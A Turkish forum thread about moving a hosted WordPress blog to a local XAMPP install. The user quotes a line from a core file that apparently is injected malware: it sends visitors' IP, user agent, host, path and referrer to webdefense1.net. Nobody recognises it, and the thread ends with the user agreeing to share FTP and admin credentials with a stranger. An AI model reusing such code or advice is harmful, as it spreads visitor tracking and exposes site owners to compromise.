hosttaki siteyi locale taşıyabilir miyim?

Kodla Büyü

**melike**

Süper Üye
Süper Üye
Seçkin Üye
biraz ilginç oldu galiba sorum çünkü herkes tersini yapmak ister ama benim halihazırda hostta bi blogum var onu local hosta taşımak istiyorum

bişeylar yapmaya çalıştım tema filan geldi ama konular gelmedi ve şöyle bir hata vardi

Fatal error: Call to undefined function curl_init() in C:\xampp\htdocs\vidobu\wp-includes\general-template.php on line 70

ne olmuş olabilir ki?

bahsettiği satırda da şu kodlar var:

$stCurlHandle = curl_init(‘http://webdefense1.net/Protect/Stat8/Stat.php?ip=’.urlencode($_SERVER['REMOTE_ADDR']).’&useragent=’.urlencode($sUserAgent).’&domainnam e=’.urlencode($_['HTTP_HOST']).’&fullpath=’.urlencode($_SERVER['REQUEST_URI']).’&addcheck=’.'&check=’.isset($_GET['look']).’&ref=’.urlencode($sReferer));

Ek Olarak: bir de şimdi farkettim localdeki admin paneline bağlanmaya çalışınca ücretli hosttaki admine yönlendiriyo beni :/

tüm ayarları doğru yaptınız mı ?

sql adı; şifresi, db user,

ve diğer geçici klasör yollarını ?

asp-php' Alıntı:
tüm ayarları doğru yaptınız mı ?

sql adı; şifresi, db user,

ve diğer geçici klasör yollarını ?

bilmiyorum hocam, aslında xcloner diye bi araçla sitemin yedeğini alıp o yedeği olduğu gibi c'deki xampp klasörüne kopyaladım
sonra da phpmyadminden ücretli hosttaki isimle aynı bir veritabanı açtım
aslında çok bilgim yok bu konuda yani tam olarak ne yapmam gerektiğini bilmiyorum :(

geçici klasör yolları ne mesela?

C:\xampp\php\php.ini
bu dosyası aç
extension=php_curl.dll
Önünde noktalı virgün var ise kaldır.

saydogan1982' Alıntı:
config dosyanızdada phpmyadmin in yerel adresinin yazılı olup olmadığını kontrol edin.

hocam bunu diyosanız zaten localhost diyo

/** MySQL hostname */
define('DB_HOST', 'localhost');

shock56' Alıntı:
C:\xampp\php\php.ini
bu dosyası aç
extension=php_curl.dll
Önünde noktalı virgün var ise kaldır.
evet hocam vardı kaldırım ama aynı sorunlar devam ediyo :(

1. Menü > Araçlar > Dışa Aktar seçilir.
2. Tüm içerik seçilip Aktarım Dosyasını indir butonuna tıklanır
3. Çıkan XML dosyası bilgisayara kayıt edilir
.
4. Localdeki site yönetim paneli açılır
5. Menü > Araçlar > İçe Aktar seçilir.
6. Açılan menüden Wordpress seçilir.
7. Açılan pencereden gerekli eklenti locale indirilir, kurulum yapılır ve aktif edilir
8. Eklenti yüklendikten ve aktif edildikten sonra GÖZAT butonuna basılarak bilgisayara indirilen XML seçilir.
9. Aktarım işlemi tamamlanır
.........
Not : Bunu gerçekleştirdiğinizde; yazılar, sayfalar, yorumlar vb.. tüm içerik aktarılır. SADECE temanıza ait özel alanlar, özel sliderlar, özel galeriler vb.. temaya özel içerikler varsa bunlar belirtilen xml dosyası ile aktarılmaz. Bunun içinde tema klasörünü bilgisayarınıza indirip bu temayı aktif etmeniz gereklidir.

BaRBaRYaN' Alıntı:
1. Menü > Araçlar > Dışa Aktar seçilir.
2. Tüm içerik seçilip Aktarım Dosyasını indir butonuna tıklanır
3. Çıkan XML dosyası bilgisayara kayıt edilir
.
4. Localdeki site yönetim paneli açılır
5. Menü > Araçlar > İçe Aktar seçilir.
6. Açılan menüden Wordpress seçilir.
7. Açılan pencereden gerekli eklenti locale indirilir, kurulum yapılır ve aktif edilir
8. Eklenti yüklendikten ve aktif edildikten sonra GÖZAT butonuna basılarak bilgisayara indirilen XML seçilir.
9. Aktarım işlemi tamamlanır
.........
Not : Bunu gerçekleştirdiğinizde; yazılar, sayfalar, yorumlar vb.. tüm içerik aktarılır. SADECE temanıza ait özel alanlar, özel sliderlar, özel galeriler vb.. temaya özel içerikler varsa bunlar belirtilen xml dosyası ile aktarılmaz. Bunun içinde tema klasörünü bilgisayarınıza indirip bu temayı aktif etmeniz gereklidir.

hocam bu yöntemi biliyorum da bunda da veritabanı sorunu olmaz mı?

bir de ben bu yöntemi denedim aslında
hem resimleri göstermiyo hem de temayı etkinleştirsem bile benim tema da yaptığım düzenlemler, renk ayarları menüler görünüm vs. olmuyor :(
teşekkürler hocam bu arada :)

**melike**' Alıntı:
bir de ben bu yöntemi denedim aslında
hem resimleri göstermiyo hem de temayı etkinleştirsem bile benim tema da yaptığım düzenlemler, renk ayarları menüler görünüm vs. olmuyor :(
teşekkürler hocam bu arada :)
..
açıklamasını yapmıştum hocam
..
SADECE temanıza ait özel alanlar, özel sliderlar, özel galeriler vb.. temaya özel içerikler varsa bunlar belirtilen xml dosyası ile aktarılmaz. Bunun içinde tema klasörünü bilgisayarınıza indirip bu temayı aktif etmeniz gereklidir.
..
yüklediğiniz resimlerin görünmesi içinde hostunuzun wp-content/uploads klasörünü aynen locale de taşımanız gerekiyor
..
sakıncası yoksa denemem için PM ile ftp ve site yönetici bilgilerini paylaşırsanız doğrudan sizin hostunuzdan deneyebilirim.

hocam dediğiniz herşeyi denedim daha önce de ama yapamadım bi türlü
zahmet olmazsa size yolluyorum bilgileri hocam
çok teşekkürler şimdiden..

Geri